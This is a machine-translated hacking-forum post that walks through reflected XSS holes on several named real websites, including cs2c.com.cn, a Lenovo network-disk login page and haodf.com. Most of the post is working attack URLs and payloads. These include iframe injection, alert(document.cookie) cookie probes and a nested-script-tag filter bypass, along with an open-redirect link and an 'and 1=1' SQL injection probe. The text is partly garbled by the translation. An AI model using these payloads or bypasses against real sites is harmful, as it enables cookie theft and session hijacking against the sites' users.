Author: Enter www.anying.org to repost, which must be noted
Dig a few xss posts.
The software xss won the bid (Sister's linux was developed by China .. The website is not secure)
1: http://www.cs2c.com.cn/search.php? Searchword = <iframe src = http://www.baidu.com> & submit = +
Enter a self-constructed feature character on the page.
<TR> <TD align = left style = "font-size: 14px; font-weight: bold; text-align: center; border-bottom: 1px dashed # ccc; "> Search <span style =" color: # FF0000 "> aaaaaaaaaaaa </span> for the following information: </TD> </TR>
Look... Aaaaaaaa is output
Let's try to see if there is any filtering.
<TR> <TD align = left style = "font-size: 14px; font-weight: bold; text-align: center; border-bottom: 1px dashed # ccc; "> Search <span style =" color: # FF0000 "> <>! @ # $ % ^ & * () </Span> The following information is found: </TD> </TR>
Look .. No Filtering
You can enter xss Code directly.
2:
Http://neocertify.cs2c.com.cn/display/webSoftIndex.do? ChannelId = 71
Let's look at the source code of what we can change.
<form id="myForm" action="/display/webQueryCompatible.do"><input type="hidden" id="keyword" name="keyword" value="aaaaaaaaaaa" /><input type="hidden" id="companyId" name="companyId" value="" />
Look !!! Aaaaaaaaaa .. But in <input> .. Value is the displayed content .. Think about it .. What if we enter "/>?
Binge !..
By the way ..
Of course, we closed the <input> tag,
So what?
The xss Code Constructed later will be executed as normal html code.
Enter in the search box
"/> <Iframe src = http://www.baidu.com>
"/> <Script> alert (document. cookie) </script>
Exposed path of the winning Software
Http://www.cs2c.com.cn/index.php? Id = 117% 20-1
I won't talk about the path.
Lenovo Enterprise Network Disk reflective xss
Https://token.vips100.com/checkAccessCode.php? Code = % 22/% 3E <iframe % 20src = http://www.baidu.com> & sec = true
Old method .. Search for a string of aaaaaaaaa source code
<
input
type
=
"hidden"
name
=
"code"
value
=
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
/>
<
input
type
=
"hidden"
name
=
"sec"
value
=
""
/>
How is it?
Look .. Very familiar ..
Okay .. We close the label
Enter "/>
We can see that a string of aaa has been output.
We enter <script>
Why ..
Our <script> seems to be filtered
<
input
type
=
"hidden"
name
=
"code"
value
=
""
/>"/>
<
input
type
=
"hidden"
name
=
"sec"
value
=
""
/>
In fact, don't be in a hurry .. We can bypass this after constructing it.
Let's enter <scr <script> ipt> to see
View
<
input
type
=
"hidden"
name
=
"code"
value
=
""
/><
script
>"/>
<
input
type
=
"hidden"
name
=
"sec"
value
=
""
/>
Okay. Try a cookie.
Enter "/> <scr <script> ipte> alert (document. cookie) </SC <script> rept> //
Try iframe
Good doctor url jump
Http://www.haodf.com/msg.php? Msg = & url = http://www.baidu.com
Good doctor xss
Http://www.haodf.com/msg.php? Msg = <script> alert (document. cookie) </script>
This xss does not have any filtering ..
Enter the xss Code directly.
Add one
An SQL injection is found when the target xss is verified.
Http://neocertify.cs2c.com.cn/di... d = 100 & newsId = 36
And 1 = 1 And 1 = 2
But I did not expose the table .. I don't know why .. Maybe the dictionary is not powerful enough.